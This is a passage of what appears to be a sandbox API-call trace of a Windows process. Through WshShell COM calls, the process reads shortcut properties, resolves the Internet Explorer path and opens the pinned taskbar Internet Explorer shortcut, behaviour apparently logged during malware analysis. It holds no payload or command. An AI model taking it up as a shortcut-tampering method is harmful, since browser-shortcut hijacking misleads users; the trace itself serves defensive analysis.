ITypeInfo:RemoteGetFuncDesc (in: This=0x5c3dccc, index=0x4, ppFuncDesc=0x5a0ddf4, pDummy=0x44f89ed2 | out: ppFuncDesc=0x5a0ddf4, pDummy=0x44f89ed2) returned 0x0 [0166.764] ITypeInfo:LocalReleaseFuncDesc (This=0x5c3dccc) returned 0x5bcd228 [0166.764] ITypeInfo:RemoteGetFuncDesc (in: This=0x5c3dccc, index=0x5, ppFuncDesc=0x5a0ddf4, pDummy=0x44f89ed2 | out: ppFuncDesc=0x5a0ddf4, pDummy=0x44f89ed2) returned 0x0 [0166.764] ITypeInfo:LocalReleaseFuncDesc (This=0x5c3dccc) returned 0x5bcd228 [0166.764] ITypeInfo:RemoteGetFuncDesc (in: This=0x5c3dccc, index=0x6, ppFuncDesc=0x5a0ddf4, pDummy=0x44f89ed2 | out: ppFuncDesc=0x5a0ddf4, pDummy=0x44f89ed2) returned 0x0 [0166.765] ITypeInfo:LocalReleaseFuncDesc (This=0x5c3dccc) returned 0x5bcd228 [0166.765] ITypeInfo:RemoteGetFuncDesc (in: This=0x5c3dccc, index=0x7, ppFuncDesc=0x5a0ddf4, pDummy=0x44f89ed2 | out: ppFuncDesc=0x5a0ddf4, pDummy=0x44f89ed2) returned 0x0 [0166.765] CoTaskMemAlloc (cb=0x4) returned 0x6350678 [0166.765] ITypeInfo:RemoteGetNames (in: This=0x5c3dccc, memid=0, rgBstrNames=0x6350678, cMaxNames=0x1, pcNames=0x5a0ddc4 | out: rgBstrNames=0x6350678*="FullName", pcNames=0x5a0ddc4*=0x1) returned 0x0 [0166.765] SysStringByteLen (bstr="FullName") returned 0x10 [0166.765] SysStringByteLen (bstr="FullName") returned 0x10 [0166.765] CoTaskMemFree (pv=0x6350678) [0166.765] ITypeInfo:LocalReleaseFuncDesc (This=0x5c3dccc) returned 0x5bcd228 [0166.765] ITypeInfo:RemoteGetFuncDesc (in: This=0x5c3dccc, index=0x8, ppFuncDesc=0x5a0ddf4, pDummy=0x44f89ed2 | out: ppFuncDesc=0x5a0ddf4, pDummy=0x44f89ed2) returned 0x0 [0166.765] CoTaskMemAlloc (cb=0x4) returned 0x6350678 [0166.765] ITypeInfo:RemoteGetNames (in: This=0x5c3dccc, memid=1000, rgBstrNames=0x6350678, cMaxNames=0x1, pcNames=0x5a0ddc4 | out: rgBstrNames=0x6350678*="Arguments", pcNames=0x5a0ddc4*=0x1) returned 0x0 [0166.766] SysStringByteLen (bstr="Arguments") returned 0x12 [0166.766] SysStringByteLen (bstr="Arguments") returned 0x12 [0166.766] CoTaskMemFree (pv=0x6350678) [0166.766] ITypeInfo:LocalReleaseFuncDesc (This=0x5c3dccc) returned 0x5bcd228 [0166.766] ITypeInfo:RemoteGetFuncDesc (in: This=0x5c3dccc, index=0x9, ppFuncDesc=0x5a0ddf4, pDummy=0x44f89ed2 | out: ppFuncDesc=0x5a0ddf4, pDummy=0x44f89ed2) returned 0x0 [0166.768] CoTaskMemAlloc (cb=0x8) returned 0x6350678 [0166.768] ITypeInfo:RemoteGetNames (in: This=0x5c3dccc, memid=1000, rgBstrNames=0x6350678, cMaxNames=0x2, pcNames=0x5a0ddc4 | out: rgBstrNames=0x6350678*="Arguments", pcNames=0x5a0ddc4*=0x1) returned 0x0 [0166.768] SysStringByteLen (bstr="Arguments") returned 0x12 [0166.768] SysStringByteLen (bstr="Arguments") returned 0x12 [0166.768] CoTaskMemFree (pv=0x6350678) [0166.768] ITypeInfo:LocalReleaseFuncDesc (This=0x5c3dccc) returned 0x5bcd228 [0166.768] ITypeInfo:RemoteGetFuncDesc (in: This=0x5c3dccc, index=0xa, ppFuncDesc=0x5a0ddf4, pDummy=0x44f89ed2 | out: ppFuncDesc=0x5a0ddf4, pDummy=0x44f89ed2) returned 0x0 [0166.768] CoTaskMemAlloc (cb=0x4) returned 0x6350678 [0166.769] ITypeInfo:RemoteGetNames (in: This=0x5c3dccc, memid=1001, rgBstrNames=0x6350678, cMaxNames=0x1, pcNames=0x5a0ddc4 | out: rgBstrNames=0x6350678*="Description", pcNames=0x5a0ddc4*=0x1) returned 0x0 [0166.769] SysStringByteLen (bstr="Description") returned 0x16 [0166.769] SysStringByteLen (bstr="Description") returned 0x16 [0166.769] CoTaskMemFree (pv=0x6350678) [0166.769] ITypeInfo:LocalReleaseFuncDesc (This=0x5c3dccc) returned 0x5bcd228 [0166.769] ITypeInfo:RemoteGetFuncDesc (in: This=0x5c3dccc, index=0xb, ppFuncDesc=0x5a0ddf4, pDummy=0x44f89ed2 | out: ppFuncDesc=0x5a0ddf4, pDummy=0x44f89ed2) returned 0x0 [0166.770] CoTaskMemAlloc (cb=0x8) returned 0x6350678 [0166.770] ITypeInfo:RemoteGetNames (in: This=0x5c3dccc, memid=1001, rgBstrNames=0x6350678, cMaxNames=0x2, pcNames=0x5a0ddc4 | out: rgBstrNames=0x6350678*="Description", pcNames=0x5a0ddc4*=0x1) returned 0x0 [0166.770] SysStringByteLen (bstr="Description") returned 0x16 [0166.770] SysStringByteLen (bstr="Description") returned 0x16 [0166.770] CoTaskMemFree (pv=0x6350678) [0166.770] ITypeInfo:LocalReleaseFuncDesc (This=0x5c3dccc) returned 0x5bcd228 [0166.770] ITypeInfo:RemoteGetFuncDesc (in: This=0x5c3dccc, index=0xc, ppFuncDesc=0x5a0ddf4, pDummy=0x44f89ed2 | out: ppFuncDesc=0x5a0ddf4, pDummy=0x44f89ed2) returned 0x0 [0166.770] CoTaskMemAlloc (cb=0x4) returned 0x6350678 [0166.770] ITypeInfo:RemoteGetNames (in: This=0x5c3dccc, memid=1002, rgBstrNames=0x6350678, cMaxNames=0x1, pcNames=0x5a0ddc4 | out: rgBstrNames=0x6350678*="Hotkey", pcNames=0x5a0ddc4*=0x1) returned 0x0 [0166.770] SysStringByteLen (bstr="Hotkey") returned 0xc [0166.770] SysStringByteLen (bstr="Hotkey") returned 0xc [0166.771] CoTaskMemFree (pv=0x6350678) [0166.771] ITypeInfo:LocalReleaseFuncDesc (This=0x5c3dccc) returned 0x5bcd228 [0166.771] ITypeInfo:RemoteGetFuncDesc (in: This=0x5c3dccc, index=0xd, ppFuncDesc=0x5a0ddf4, pDummy=0x44f89ed2 | out: ppFuncDesc=0x5a0ddf4, pDummy=0x44f89ed2) returned 0x0 [0166.771] CoTaskMemAlloc (cb=0x8) returned 0x6350678 [0166.771] ITypeInfo:RemoteGetNames (in: This=0x5c3dccc, memid=1002, rgBstrNames=0x6350678, cMaxNames=0x2, pcNames=0x5a0ddc4 | out: rgBstrNames=0x6350678*="Hotkey", pcNames=0x5a0ddc4*=0x1) returned 0x0 [0166.771] SysStringByteLen (bstr="Hotkey") returned 0xc [0166.771] SysStringByteLen (bstr="Hotkey") returned 0xc [0166.771] CoTaskMemFree (pv=0x6350678) [0166.771] ITypeInfo:LocalReleaseFuncDesc (This=0x5c3dccc) returned 0x5bcd228 [0166.771] ITypeInfo:RemoteGetFuncDesc (in: This=0x5c3dccc, index=0xe, ppFuncDesc=0x5a0ddf4, pDummy=0x44f89ed2 | out: ppFuncDesc=0x5a0ddf4, pDummy=0x44f89ed2) returned 0x0 [0166.772] CoTaskMemAlloc (cb=0x4) returned 0x6350678 [0166.772] ITypeInfo:RemoteGetNames (in: This=0x5c3dccc, memid=1003, rgBstrNames=0x6350678, cMaxNames=0x1, pcNames=0x5a0ddc4 | out: rgBstrNames=0x6350678*="IconLocation", pcNames=0x5a0ddc4*=0x1) returned 0x0 [0166.772] SysStringByteLen (bstr="IconLocation") returned 0x18 [0166.772] SysStringByteLen (bstr="IconLocation") returned 0x18 [0166.772] CoTaskMemFree (pv=0x6350678) [0166.772] ITypeInfo:LocalReleaseFuncDesc (This=0x5c3dccc) returned 0x5bcd228 [0166.772] ITypeInfo:RemoteGetFuncDesc (in: This=0x5c3dccc, index=0xf, ppFuncDesc=0x5a0ddf4, pDummy=0x44f89ed2 | out: ppFuncDesc=0x5a0ddf4, pDummy=0x44f89ed2) returned 0x0 [0166.772] CoTaskMemAlloc (cb=0x8) returned 0x6350678 [0166.772] ITypeInfo:RemoteGetNames (in: This=0x5c3dccc, memid=1003, rgBstrNames=0x6350678, cMaxNames=0x2, pcNames=0x5a0ddc4 | out: rgBstrNames=0x6350678*="IconLocation", pcNames=0x5a0ddc4*=0x1) returned 0x0 [0166.772] SysStringByteLen (bstr="IconLocation") returned 0x18 [0166.772] SysStringByteLen (bstr="IconLocation") returned 0x18 [0166.772] CoTaskMemFree (pv=0x6350678) [0166.772] ITypeInfo:LocalReleaseFuncDesc (This=0x5c3dccc) returned 0x5bcd228 [0166.772] ITypeInfo:RemoteGetFuncDesc (in: This=0x5c3dccc, index=0x10, ppFuncDesc=0x5a0ddf4, pDummy=0x44f89ed2 | out: ppFuncDesc=0x5a0ddf4, pDummy=0x44f89ed2) returned 0x0 [0166.773] CoTaskMemAlloc (cb=0x8) returned 0x6350678 [0166.773] ITypeInfo:RemoteGetNames (in: This=0x5c3dccc, memid=1004, rgBstrNames=0x6350678, cMaxNames=0x2, pcNames=0x5a0ddc4 | out: rgBstrNames=0x6350678*="RelativePath", pcNames=0x5a0ddc4*=0x1) returned 0x0 [0166.773] SysStringByteLen (bstr="RelativePath") returned 0x18 [0166.773] SysStringByteLen (bstr="RelativePath") returned 0x18 [0166.773] CoTaskMemFree (pv=0x6350678) [0166.773] ITypeInfo:LocalReleaseFuncDesc (This=0x5c3dccc) returned 0x5bcd228 [0166.773] ITypeInfo:RemoteGetFuncDesc (in: This=0x5c3dccc, index=0x11, ppFuncDesc=0x5a0ddf4, pDummy=0x44f89ed2 | out: ppFuncDesc=0x5a0ddf4, pDummy=0x44f89ed2) returned 0x0 [0166.773] CoTaskMemAlloc (cb=0x4) returned 0x6350678 [0166.773] ITypeInfo:RemoteGetNames (in: This=0x5c3dccc, memid=1005, rgBstrNames=0x6350678, cMaxNames=0x1, pcNames=0x5a0ddc4 | out: rgBstrNames=0x6350678*="TargetPath", pcNames=0x5a0ddc4*=0x1) returned 0x0 [0166.773] SysStringByteLen (bstr="TargetPath") returned 0x14 [0166.773] SysStringByteLen (bstr="TargetPath") returned 0x14 [0166.774] CoTaskMemFree (pv=0x6350678) [0166.774] ITypeInfo:LocalReleaseFuncDesc (This=0x5c3dccc) returned 0x5bcd228 [0166.774] ITypeInfo:RemoteGetFuncDesc (in: This=0x5c3dccc, index=0x12, ppFuncDesc=0x5a0ddf4, pDummy=0x44f89ed2 | out: ppFuncDesc=0x5a0ddf4, pDummy=0x44f89ed2) returned 0x0 [0166.774] CoTaskMemAlloc (cb=0x8) returned 0x6350678 [0166.774] ITypeInfo:RemoteGetNames (in: This=0x5c3dccc, memid=1005, rgBstrNames=0x6350678, cMaxNames=0x2, pcNames=0x5a0ddc4 | out: rgBstrNames=0x6350678*="TargetPath", pcNames=0x5a0ddc4*=0x1) returned 0x0 [0166.774] SysStringByteLen (bstr="TargetPath") returned 0x14 [0166.774] SysStringByteLen (bstr="TargetPath") returned 0x14 [0166.774] CoTaskMemFree (pv=0x6350678) [0166.774] ITypeInfo:LocalReleaseFuncDesc (This=0x5c3dccc) returned 0x5bcd228 [0166.774] ITypeInfo:RemoteGetFuncDesc (in: This=0x5c3dccc, index=0x13, ppFuncDesc=0x5a0ddf4, pDummy=0x44f89ed2 | out: ppFuncDesc=0x5a0ddf4, pDummy=0x44f89ed2) returned 0x0 [0166.775] CoTaskMemAlloc (cb=0x4) returned 0x6350678 [0166.775] ITypeInfo:RemoteGetNames (in: This=0x5c3dccc, memid=1006, rgBstrNames=0x6350678, cMaxNames=0x1, pcNames=0x5a0ddc4 | out: rgBstrNames=0x6350678*="WindowStyle", pcNames=0x5a0ddc4*=0x1) returned 0x0 [0166.775] SysStringByteLen (bstr="WindowStyle") returned 0x16 [0166.775] SysStringByteLen (bstr="WindowStyle") returned 0x16 [0166.775] CoTaskMemFree (pv=0x6350678) [0166.775] ITypeInfo:LocalReleaseFuncDesc (This=0x5c3dccc) returned 0x5bcd228 [0166.775] ITypeInfo:RemoteGetFuncDesc (in: This=0x5c3dccc, index=0x14, ppFuncDesc=0x5a0ddf4, pDummy=0x44f89ed2 | out: ppFuncDesc=0x5a0ddf4, pDummy=0x44f89ed2) returned 0x0 [0166.775] CoTaskMemAlloc (cb=0x8) returned 0x6350678 [0166.775] ITypeInfo:RemoteGetNames (in: This=0x5c3dccc, memid=1006, rgBstrNames=0x6350678, cMaxNames=0x2, pcNames=0x5a0ddc4 | out: rgBstrNames=0x6350678*="WindowStyle", pcNames=0x5a0ddc4*=0x1) returned 0x0 [0166.775] SysStringByteLen (bstr="WindowStyle") returned 0x16 [0166.775] SysStringByteLen (bstr="WindowStyle") returned 0x16 [0166.775] CoTaskMemFree (pv=0x6350678) [0166.775] ITypeInfo:LocalReleaseFuncDesc (This=0x5c3dccc) returned 0x5bcd228 [0166.775] ITypeInfo:RemoteGetFuncDesc (in: This=0x5c3dccc, index=0x15, ppFuncDesc=0x5a0ddf4, pDummy=0x44f89ed2 | out: ppFuncDesc=0x5a0ddf4, pDummy=0x44f89ed2) returned 0x0 [0166.776] CoTaskMemAlloc (cb=0x4) returned 0x6350678 [0166.776] ITypeInfo:RemoteGetNames (in: This=0x5c3dccc, memid=1007, rgBstrNames=0x6350678, cMaxNames=0x1, pcNames=0x5a0ddc4 | out: rgBstrNames=0x6350678*="WorkingDirectory", pcNames=0x5a0ddc4*=0x1) returned 0x0 [0166.776] SysStringByteLen (bstr="WorkingDirectory") returned 0x20 [0166.776] SysStringByteLen (bstr="WorkingDirectory") returned 0x20 [0166.776] CoTaskMemFree (pv=0x6350678) [0166.776] ITypeInfo:LocalReleaseFuncDesc (This=0x5c3dccc) returned 0x5bcd228 [0166.776] ITypeInfo:RemoteGetFuncDesc (in: This=0x5c3dccc, index=0x16, ppFuncDesc=0x5a0ddf4, pDummy=0x44f89ed2 | out: ppFuncDesc=0x5a0ddf4, pDummy=0x44f89ed2) returned 0x0 [0166.776] CoTaskMemAlloc (cb=0x8) returned 0x6350678 [0166.776] ITypeInfo:RemoteGetNames (in: This=0x5c3dccc, memid=1007, rgBstrNames=0x6350678, cMaxNames=0x2, pcNames=0x5a0ddc4 | out: rgBstrNames=0x6350678*="WorkingDirectory", pcNames=0x5a0ddc4*=0x1) returned 0x0 [0166.776] SysStringByteLen (bstr="WorkingDirectory") returned 0x20 [0166.777] SysStringByteLen (bstr="WorkingDirectory") returned 0x20 [0166.777] CoTaskMemFree (pv=0x6350678) [0166.777] ITypeInfo:LocalReleaseFuncDesc (This=0x5c3dccc) returned 0x5bcd228 [0166.777] ITypeInfo:RemoteGetFuncDesc (in: This=0x5c3dccc, index=0x17, ppFuncDesc=0x5a0ddf4, pDummy=0x44f89ed2 | out: ppFuncDesc=0x5a0ddf4, pDummy=0x44f89ed2) returned 0x0 [0166.777] CoTaskMemAlloc (cb=0x8) returned 0x6350678 [0166.777] ITypeInfo:RemoteGetNames (in: This=0x5c3dccc, memid=2000, rgBstrNames=0x6350678, cMaxNames=0x2, pcNames=0x5a0ddc4 | out: rgBstrNames=0x6350678*="Load", pcNames=0x5a0ddc4*=0x2) returned 0x0 [0166.777] SysStringByteLen (bstr="Load") returned 0x8 [0166.777] SysStringByteLen (bstr="Load") returned 0x8 [0166.777] SysStringByteLen (bstr="PathLink") returned 0x10 [0166.777] SysStringByteLen (bstr="PathLink") returned 0x10 [0166.777] CoTaskMemFree (pv=0x6350678) [0166.778] ITypeInfo:LocalReleaseFuncDesc (This=0x5c3dccc) returned 0x5bcd228 [0166.778] ITypeInfo:RemoteGetFuncDesc (in: This=0x5c3dccc, index=0x18, ppFuncDesc=0x5a0ddf4, pDummy=0x44f89ed2 | out: ppFuncDesc=0x5a0ddf4, pDummy=0x44f89ed2) returned 0x0 [0166.778] CoTaskMemAlloc (cb=0x4) returned 0x6350678 [0166.778] ITypeInfo:RemoteGetNames (in: This=0x5c3dccc, memid=2001, rgBstrNames=0x6350678, cMaxNames=0x1, pcNames=0x5a0ddc4 | out: rgBstrNames=0x6350678*="Save", pcNames=0x5a0ddc4*=0x1) returned 0x0 [0166.778] SysStringByteLen (bstr="Save") returned 0x8 [0166.778] SysStringByteLen (bstr="Save") returned 0x8 [0166.778] CoTaskMemFree (pv=0x6350678) [0166.778] ITypeInfo:LocalReleaseFuncDesc (This=0x5c3dccc) returned 0x6344c70 [0166.919] CoGetContextToken (in: pToken=0x5a0db24 | out: pToken=0x5a0db24) returned 0x0 [0166.919] WshShell:IUnknown:QueryInterface (in: This=0x283d60, riid=0x71d96a28*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5a0db94 | out: ppvObject=0x5a0db94*=0x283d50) returned 0x0 [0166.919] WshShell:IDispatch:Invoke (in: This=0x283d50, dispIdMember=1005, riid=0x5bfa888*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x0, wFlags=0x3, pDispParams=0x5a0df38*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x5a0df28, pExcepInfo=0x5a0df08, puArgErr=0x5a0df04 | out: pDispParams=0x5a0df38*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x5a0df28*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", varVal2=0x0), pExcepInfo=0x5a0df08*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x5a0df04*=0x0) returned 0x0 [0166.922] SysStringLen (param_1="C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe") returned 0x35 [0166.922] WshShell:IUnknown:Release (This=0x283d50) returned 0x2 [0166.945] CoGetContextToken (in: pToken=0x5a0db7c | out: pToken=0x5a0db7c) returned 0x0 [0166.945] WshShell:IUnknown:QueryInterface (in: This=0x283d60, riid=0x71d96a28*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5a0dbe8 | out: ppvObject=0x5a0dbe8*=0x283d50) returned 0x0 [0166.945] WshShell:IDispatch:Invoke (in: This=0x283d50, dispIdMember=1005, riid=0x5bfa888*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x0, wFlags=0x3, pDispParams=0x5a0df8c*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x5a0df7c, pExcepInfo=0x5a0df5c, puArgErr=0x5a0df58 | out: pDispParams=0x5a0df8c*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x5a0df7c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", varVal2=0x0), pExcepInfo=0x5a0df5c*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x5a0df58*=0x0) returned 0x0 [0166.945] SysStringLen (param_1="C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe") returned 0x35 [0166.945] WshShell:IUnknown:Release (This=0x283d50) returned 0x2 [0166.967] GetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Internet Explorer (2).lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\internet explorer (2).lnk")) returned 0x20 [0166.968] GetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Internet Explorer.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\internet explorer.lnk")) returned 0x20 [0166.969] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Internet Explorer.lnk", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x76 [0166.969] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Internet Explorer.lnk", nBufferLength=0x76, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Internet Explorer.lnk", lpFilePart=0x0) returned 0x75 [0166.970] CoGetContextToken (in: pToken=0x5a0dba4 | out: pToken=0x5a0dba4) returned 0x0 [0166.970] WshShell:IUnknown:QueryInterface (in: This=0x283d34, riid=0x71d96a28*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5a0dc10 | out: ppvObject=0x5a0dc10*=0x283d20) returned 0x0 [0166.970] WshShell:IDispatch:Invoke (in: This=0x283d20, dispIdMember=1002, riid=0x5bfa888*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x0, wFlags=0x3, pDispParams=0x5a0dfc4*(rgvarg=([0]=0x5a0dfb4*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Internet Explorer.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\internet explorer.lnk"), varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x5a0dfa4, pExcepInfo=0x5a0df84, puArgErr=0x5a0df80 | out: pDispParams=0x5a0dfc4*(rgvarg=([0]=0x5a0dfb4*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Internet Explorer.lnk", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x5a0dfa4*(varType=0x9, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x283d88, varVal2=0x0), pExcepInfo=0x5a0df84*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x5a0df80*=0x0) returned 0x0 [0166.975] WshShell:IUnknown:QueryInterface (in: This=0x283d88, riid=0x71cb2a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5a0da3c | out: ppvObject=0x5a0da3c*=0x283d98) returned 0x0 [0166.976] WshShell:IUnknown:QueryInterface (in: This=0x283d98, riid=0x71da1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x5a0d9f0 | out: ppvObject=0x5a0d9f0*=0x0) returned 0x80004002 [0166.976] WshShell:IUnknown:QueryInterface (in: This=0x283d98, riid=0x71da1e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x5a0d818 | out: ppvObject=0x5a0d818*=0x283da8) returned 0x0 [0166.976] WshShell:IProvideClassInfo:GetClassInfo (in: This=0x283da8, ppTI=0x5a0d820 | out: ppTI=0x5a0d820*=0x5c3dcf8) returned 0x0 [0166.976] ITypeInfo:RemoteGetTypeAttr (in: This=0x5c3dcf8, ppTypeAttr=0x5a0d814, pDummy=0x40e4bd9c | out: ppTypeAttr=0x5a0d814, pDummy=0x40e4bd9c) returned 0x0 [0166.976] ITypeInfo:LocalReleaseTypeAttr (This=0x5c3dcf8) returned 0x633b0d8 [0166.976] WshShell:IUnknown:Release (This=0x283da8) returned 0x2 [0166.976] WshShell:IUnknown:Release (This=0x5c3dcf8) returned 0x5 [0166.976] WshShell:IUnknown:AddRef (This=0x283d98) returned 0x3 [0166.976] WshShell:IUnknown:QueryInterface (in: This=0x283d98, riid=0x71da182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x5a0d34c | out: ppvObject=0x5a0d34c*=0x0) returned 0x80004002 [0166.977] WshShell:IUnknown:QueryInterface (in: This=0x283d98, riid=0x71da1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x5a0d2fc | out: ppvObject=0x5a0d2fc*=0x0) returned 0x80004002 [0166.977] WshShell:IUnknown:QueryInterface (in: This=0x283d98, riid=0x71cd1388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5a0d308 | out: ppvObject=0x5a0d308*=0x0) returned 0x80004002 [0166.977] CoGetContextToken (in: pToken=0x5a0d368 | out: pToken=0x5a0d368) returned 0x0 [0166.977] CoGetContextToken (in: pToken=0x5a0d77c | out: pToken=0x5a0d77c) returned 0x0 [0166.977] WshShell:IUnknown:QueryInterface (in: This=0x283d98, riid=0x71da1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5a0d7fc | out: ppvObject=0x5a0d7fc*=0x0) returned 0x80004002 [0166.977] WshShell:IUnknown:Release (This=0x283d98) returned 0x2 [0166.977] WshShell:IUnknown:Release (This=0x283d20) returned 0x2 [0166.977] CoGetContextToken (in: pToken=0x5a0de04 | out: pToken=0x5a0de04) returned 0x0 [0166.977] CoGetContextToken (in: pToken=0x5a0dd64 | out: pToken=0x5a0dd64) returned 0x0 [0166.977] WshShell:IUnknown:QueryInterface (in: This=0x283d98, riid=0x5a0de34*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5a0de30 | out: ppvObject=0x5a0de30*=0x283d88) returned 0x0 [0166.977] WshShell:IUnknown:AddRef (This=0x283d88) returned 0x3 [0166.977] WshShell:IUnknown:Release (This=0x283d88) returned 0x2 [0166.977] WshShell:IDispatch:GetTypeInfoCount (in: This=0x283d88, pctinfo=0x5a0de8c | out: pctinfo=0x5a0de8c) returned 0x0 [0166.977] WshShell:IDispatch:GetTypeInfo (in: This=0x283d88, iTInfo=0x0, lcid=0x0, ppTInfo=0x5a0de88 | out: ppTInfo=0x5a0de88*=0x5c3dcf8) returned 0x0 [0166.977] WshShell:IUnknown:QueryInterface (in: This=0x5c3dcf8, riid=0x71cb2a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5a0d98c | out: ppvObject=0x5a0d98c*=0x5c3dcf8) returned 0x0 [0166.978] WshShell:IUnknown:Release (This=0x5c3dcf8) returned 0x6 [0166.978] CoGetContextToken (in: pToken=0x5a0dcac | out: pToken=0x5a0dcac) returned 0x0 [0166.978] WshShell:IUnknown:AddRef (This=0x5c3dcf8) returned 0x7 [0166.978] WshShell:IUnknown:Release (This=0x5c3dcf8) returned 0x6 [0166.978] WshShell:IUnknown:Release (This=0x5c3dcf8) returned 0x5 [0166.978] ITypeInfo:RemoteGetTypeAttr (in: This=0x5c3dcf8, ppTypeAttr=0x5a0de8c, pDummy=0x44f89ed2 | out: ppTypeAttr=0x5a0de8c, pDummy=0x44f89ed2) returned 0x0 [0166.978] ITypeInfo:LocalReleaseTypeAttr (This=0x5c3dcf8) returned 0x633b0d8 